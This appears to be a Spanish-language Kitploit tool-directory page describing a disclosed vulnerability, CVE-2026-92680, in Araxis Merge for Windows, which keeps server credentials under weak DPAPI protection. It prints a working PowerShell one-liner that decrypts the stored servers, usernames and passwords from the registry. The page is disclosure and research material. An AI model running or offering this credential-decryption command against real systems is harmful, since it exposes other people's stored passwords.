Skip to content
KitploitKITPLOIT
HerramientasExploitsBlog
Log in
Enviar
HerramientasExploitsBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-92680 — Prueba de concepto que descifra las credenciales de servidor de Araxis Merge protegidas con DPAPI (CVE-2026-92680), demostrando un almacenamiento de credenciales insuficientemente protegido en Windows. | Kitploit
Herramientas/GitHubGitHub/grepstrength/cve-2026-92680
Descifrado de ContraseñasAnálisis de VulnerabilidadesExplotaciónCriptografía
GitHubgrepstrength/cve-2026-92680

CVE-2026-92680

Prueba de concepto que descifra las credenciales de servidor de Araxis Merge protegidas con DPAPI (CVE-2026-92680), demostrando un almacenamiento de credenciales insuficientemente protegido en Windows.

Ver Repositorio

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
11hace 0 díasAún no revisado

CVE-2026-92680

Araxis Merge para Windows almacena las credenciales del servidor con DPAPI con pOptionalEntropy establecido en NULL. Esto permite que cualquier código que se ejecute en el mismo contexto de usuario las descifre.

Análisis completo: https://grepstrength.com/research/araxis-merge

CVECVE-2026-92680
CWECWE-522: Credenciales insuficientemente protegidas
CVSS v3.15.5 (AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N)
FabricanteAraxis Ltd.
AfectadoAraxis Merge para Windows 2011.4074 hasta 2026.0
Corregido en2026.1
Aviso del fabricanteMerge-SA-26-00
Reportado2026-08-18
Divulgado2026-XX-XX
ReporterogrepStrength

Prueba de concepto

Esto descifrará y analizará HKCU\Software\Araxis\Merge\7.1\Passwords. Debe ejecutarse como el mismo usuario de Windows que almacenó originalmente las credenciales.

root@kitploit:~
Add-Type -AssemblyName System.Security; $p=[Security.Cryptography.ProtectedData]::Unprotect((Get-ItemProperty "HKCU:\Software\Araxis\Merge\7.1").Passwords,$null,'CurrentUser'); $i=48; $f=@(); while($i -lt $p.Length){$l=[BitConverter]::ToInt64($p,$i+8);$i+=16;$f+=[Text.Encoding]::Unicode.GetString($p,$i,$l*2);$i+=$l*2}; 0..($f.Count/4-1)|%{[PSCustomObject]@{Server=$f[$_*4+1];Username=$f[$_*4+2];Password=$f[$_*4+3]}}|Format-Table -AutoSize

Notas

Todas las pruebas se realizaron en sistemas propiedad de grepStength Security utilizando únicamente credenciales sintéticas. Esto se reportó a Araxis Ltd. y se divulgó públicamente después de que se pusiera a disposición una corrección.

Licencia

MIT

Descargar herramienta